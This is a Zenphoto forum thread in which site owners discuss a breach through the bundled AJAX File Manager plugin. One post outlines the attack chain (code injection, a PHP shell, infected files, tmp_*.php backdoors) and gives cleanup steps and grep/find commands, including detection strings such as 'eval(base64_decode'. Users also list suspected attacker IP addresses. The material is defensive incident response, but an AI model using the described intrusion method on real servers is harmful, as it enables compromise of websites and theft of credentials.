Zenphoto
The simpler media website CMS
ZenphotoThe simpler media website CMS
Forum search only. You might also want to search on the main site's user guide.
Your support helps pay for this server, and helps development of zenphoto. Thank you!
Visit the donations page
Comments
Hope it helps someone!
OK, enough with what happened... the question is how to clean up the mess.
What do you say about deleting everything apart from the albums folder + copy the table which has got the names of galleries? I have like hundreds of galleries and it would be too much for me to add names again.
Can anyone from Zenphoto tell me the tables to copy? Is the way I want it to do possible at all?
Installing fresh Zenphoto, copying albums, adding only the images + descriptions tables.
You know what, this might be in fact a nice idea for a quick script : )
What dod you say, guys?
Follow the upgrade/installation instructions and don't touch the albums folder. Then all should be as before,
I don't know, I'm not sure I want to leave it like that... I'd rather have everything cleaned up...
It is up to you as the site manager to check if there is anything else.
All we know is that the 3rd party file manager we included is probably more insecure than the issue fixed we did for 1.4.1.5. Thus is should be removed completly.
Or something else, still significant you have on your mind?
If you upgrade normally all core files are replaced. It is up to you as the site manager to check other files like custom themes, the database etc.
1. The AJAX File Manager has a number of vulnerabilities. Through the class.images.php and the ajaxfilemanager.php and maybe more.
2. When exploiting these files a hacker is able to insert their own code into the Ajax File Manager data.php and/or write out their own files by dynamically inserting PHP functions into the script due to the way the AJAX File Manager handles a POST request.
3. Hackers can install a PHP Shell Script which can access every file on your webserver.
4. Their shell script will add code to the top of every file on your webserver (infect every PHP file on the server) and also possible infect your .htaccess files as well. There are different variations of the attack that do different things.
5. Their shell script will install a number of other PHP files that they can access directly to regain access to your server even after you delete the Ajax File Manager and clean all of the infected files where code has been added to them.
5. You may notice files such as tmp_989089080.php or other unknown files that you need to delete as well.
6. If you host multiple domains or WordPress installs under a single account chances are these websites will be infected too.
What to do about it? How to fix it?
1. Delete the zp-core/zp-extensions/tiny_mce/plugins/ajaxfilemanager directory
2. Restore all of your website(s) files from a backup because they all have been infected.
If you don't have a backup you will need to delete Zen Photo completely a reinstall (make sure you delete the ajaxfilemanager directory if you reinstall)
3. If you have WordPress or other sites hosted (and no backups) you will need backup your wp-content folder ... then delete all the WordPress files, reinstall. AND GO THROUGH EACH FILE in wp-content to remove the code inserted at the top of every PHP file before restoring the wp-content folder.
4. You will need to go through each and every folder on your server or hostign account to remove any additional files and shell scripts that were installed by the exploit. Files such as tmp_989809809.php etc ...
5. IMPORTANT
You will need to change the passwords of your databases for any website you host that has been infected. The exploit allows the hacker to view the source code on the config files, thereby they know what your database passwords are. This would allow them to continue to regain access through PHPMyAdmin etc. even if you cleaned everything. You need to change your passwords!!
6. If you have Shell access to your server you can run the following commands to see if you have cleaned everything or help you clean everything:
7. Part of the attack *might* allow the hacker to gain access to your browser Cookie and Session info so in conjunction with the infected files they will be notified when you login to your Zen Photo Admin or other Admin tools and might be able to hijack your session to gain access to the admin without knowing your actual password. So clear your cookies and reset your Admin passwords. I don't see this happening but it is a possibility.
Run these commands from the top directory on your server or hosting account:
This will show you all the files on your webserver that have been infected and need to be cleaned:
grep -r -H "lb11" *
(looks for the string 'lb11' in every file - infected files have this inserted into them) You can substitute 'lb11' with other strongs that the hacker might have inserted into your code. For example:
grep -r -H "eval(base64_decode" *
Use the find command to show additional files that may have been installed on your server:
find / -name tmp*
Use the find command to show files that have been modified in the last day (these would be the files that have been infected or added):
find . -type f -mtime -1
Look in your access log files for suspicious activity and Ban those IP addresses:
cat access.log | grep ajaxfilemanager
cat access.log | grep ".php"
Hope this info helps ...
We identified 4 Ip addresses that asked to our server the ajaxfilemanger files:
31.133.44.40
81.163.143.194
78.24.220.110
209.44.123.133
This is really bad. I'm quite disappointed that I installed malicious code from zenphoto.
Filipe - it's disappointing, but you run this risk with any php based software that accepts a user input. Whether you wrote it yourself or got it from places like zenphoto.
However, a more pro-active alert would have been good. I only upgraded to 1.4.1.4 a couple of weeks back, so wasn't checking this site looking for new updates. Each forum member has registered with an email address, how about a bulk email alert?
Regarding more alert. If you don't visit the site regulary, use the rss feed, subscribe to our Twitter account (mirrors the rss) or the Google announcment mailing group (also all translators got it via the translate group).
Additionally there is an included plugin that displays the latest news within your Zenphoto admin overview pages if enabled
Sorry, if you use a free software you have also to be a little self active, too. We are a pretty small team (apart half a day due to time zones) and I think we were pretty fast with all this for that.
Btw, the forum has no massmail tool as far as I know.
I listed some address ip :
31.133.44.40
62.109.21.23
78.24.220.110
81.163.143.194
82.146.43.62
92.63.102.50
92.63.105.26
92.63.107.39
209.44.123.133